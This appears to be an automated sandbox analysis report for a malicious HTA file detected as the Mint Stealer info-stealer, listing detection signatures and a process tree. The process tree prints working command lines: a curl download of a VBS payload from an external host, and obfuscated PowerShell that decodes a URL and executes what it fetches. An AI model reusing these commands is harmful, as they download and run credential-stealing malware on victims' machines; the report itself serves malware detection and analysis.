Edit tour
Windows
Analysis Report
PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta
Overview
General Information
| Sample name: | PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.htarenamed because original name is a hash value |
| Original sample name: | PKO_0019289289544_PDF_.hta |
| Analysis ID: | 1578780 |
| MD5: | 80acb2df20b8aa675a02058a2a5a7cbb |
| SHA1: | ab0fb4d7568de09e774b0a47c08d156084f642c4 |
| SHA256: | bf2df69719d5cebbeca305ca64b8327b26c5b0312a516467b80034c3735dbd25 |
| Tags: | htauser-cdcd |
| Infos: |   |
 | |
Detection
Mint Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Mint Stealer
AI detected suspicious sample
Creates processes via WMI
Obfuscated command line found
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
mshta.exe (PID: 6700 cmdline: mshta.exe "C:\Users\ user\Deskt op\PKO_001 9289289544 _PDF_#U246 3#U2466#U2 465#U2462# U2461#U246 6#U2464#U2 462.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
cmd.exe (PID: 2136 cmdline: "C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\676556 be12aca.vb s https:// file-downl oad.bytez. cloud/6765 56be12355/ 676556be12 aca.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
curl.exe (PID: 6964 cmdline: curl -k -o C:\Users\ Public\676 556be12aca .vbs https ://file-do wnload.byt ez.cloud/6 76556be123 55/676556b e12aca.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 2836 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 76556be12a ca.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3384 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
wscript.exe (PID: 6960 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \676556be1 2aca.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - wscript.exe (PID: 4248 cmdline:
"C:\Window s\System32 \wscript.e xe" //E:js cript C:\U sers\user\ AppData\Lo cal\Temp\c agesr.js MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 2044 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 76556be12a ca.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5016 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 4296 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \676556be1 2aca.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - wscript.exe (PID: 6484 cmdline:
"C:\Window s\System32 \wscript.e xe" //E:js cript C:\U sers\user\ AppData\Lo cal\Temp\d jtukm.js MD5: FF00E0480075B095948000BDC66E81F0) - conhost.exe (PID: 3052 cmdline:
conhost -- headless p owershell $tfqdysmbl vrcw='ur' ;new-alias printout c$($tfqdys mblvrcw)l; $eipxqtmau fl=(3052,3 063,3071,3 055,3057,3 052,3072,3 071,3076,3 009,3071,3 005,3052,3 000,3070,3 065,3066,3 001,3003,3 000,3066,3 058,3066,3 017,3069,3 015,3063,3 059,3064,3 070,3069,3 004,3003); $ojxutsrkd wlmfg=('br onx','get- cmdlet');$ beuwadknj= $eipxqtmau fl;foreach ($juaveihg nosc in $b euwadknj){ $edlkzoftx n=$juaveih gnosc;$soj qxwd=$sojq xwd+[char] ($edlkzoft xn-2954);$ cqgevos=$s ojqxwd; $h maoevupsdb n=$cqgevos };$knztexj ygdmwfo[2] =$hmaoevup sdbn;$lkrp qc='rl';$y patcirzmqu ds=1;.$([c har](9992- 9887)+'e'+ 'x')(print out -useb $hmaoevups dbn) MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7172 cmdline: powershell $tfqdysmb lvrcw='ur' ;new-alia s printout c$($tfqdy smblvrcw)l ;$eipxqtma ufl=(3052, 3063,3071, 3055,3057, 3052,3072, 3071,3076, 3009,3071, 3005,3052, 3000,3070, 3065,3066, 3001,3003, 3000,3066, 3058,3066, 3017,3069, 3015,3063, 3059,3064, 3070,3069, 3004,3003) ;$ojxutsrk dwlmfg=('b ronx','get -cmdlet'); $beuwadknj =$eipxqtma ufl;foreac h($juaveih gnosc in $ beuwadknj) {$edlkzoft xn=$juavei hgnosc;$so jqxwd=$soj qxwd+[char ]($edlkzof txn-2954); $cqgevos=$ sojqxwd; $ hmaoevupsd bn=$cqgevo s};$knztex jygdmwfo[2 ]=$hmaoevu psdbn;$lkr pqc='rl';$ ypatcirzmq uds=1;.$([ char](9992 -9887)+'e' +'x')(prin tout -useb $hmaoevup sdbn) MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7212 cmdline:
conhost -- headless p owershell $wcahze='u r' ;new-al ias printo ut c$($wca hze)l;$trs oqwlp=(181 1,1822,183 0,1814,181 6,1811,183 1,1830,183 5,1768,183 0,1764,181 1,1759,182 9,1824,182 5,1760,176 2,1759,182 5,1817,182 5,1776,182 8,1774,182 2,1818,182 3,1829,182 8,1763,176 2);$xepbrq koau=('bro nx','get-c mdlet');$d ehltizxfcs wu=$trsoqw lp;foreach ($fahyrwnc bvdkjm in $dehltizxf cswu){$dgz nhjbpvsl=$ fahyrwncbv dkjm;$pkhd avnfqjgs=$ pkhdavnfqj gs+[char]( $dgznhjbpv sl-1713);$ swoezd=$pk hdavnfqjgs ; $zotfqba scrdlje=$s woezd};$jm lkbouispxc rh[2]=$zot fqbascrdlj e;$kuwexim jag='rl';$ obgwvcmaft =1;.$([cha r](9992-98 87)+'e'+'x ')(printou t -useb $z otfqbascrd lje) MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7232 cmdline:
powershell $wcahze=' ur' ;new-a lias print out c$($wc ahze)l;$tr soqwlp=(18 11,1822,18 30,1814,18 16,1811,18 31,1830,18 35,1768,18 30,1764,18 11,1759,18 29,1824,18 25,1760,17 62,1759,18 25,1817,18 25,1776,18 28,1774,18 22,1818,18 23,1829,18 28,1763,17 62);$xepbr qkoau=('br onx','get- cmdlet');$ dehltizxfc swu=$trsoq wlp;foreac h($fahyrwn cbvdkjm in $dehltizx fcswu){$dg znhjbpvsl= $fahyrwncb vdkjm;$pkh davnfqjgs= $pkhdavnfq jgs+[char] ($dgznhjbp vsl-1713); $swoezd=$p khdavnfqjg s; $zotfqb ascrdlje=$ swoezd};$j mlkbouispx crh[2]=$zo tfqbascrdl je;$kuwexi mjag='rl'; $obgwvcmaf t=1;.$([ch ar](9992-9 887)+'e'+' x')(printo ut -useb $ zotfqbascr dlje) MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
| JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
| JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
System Summary |   |
|---|
| Source: | Author: frack113, Florian Roth (Nextron Systems): | ||
| Source: | Author: frack113, Florian Roth: | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Michael Haag: | ||
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Tim Shelton: | ||
| Source: | Author: frack113: | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Michael Haag: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||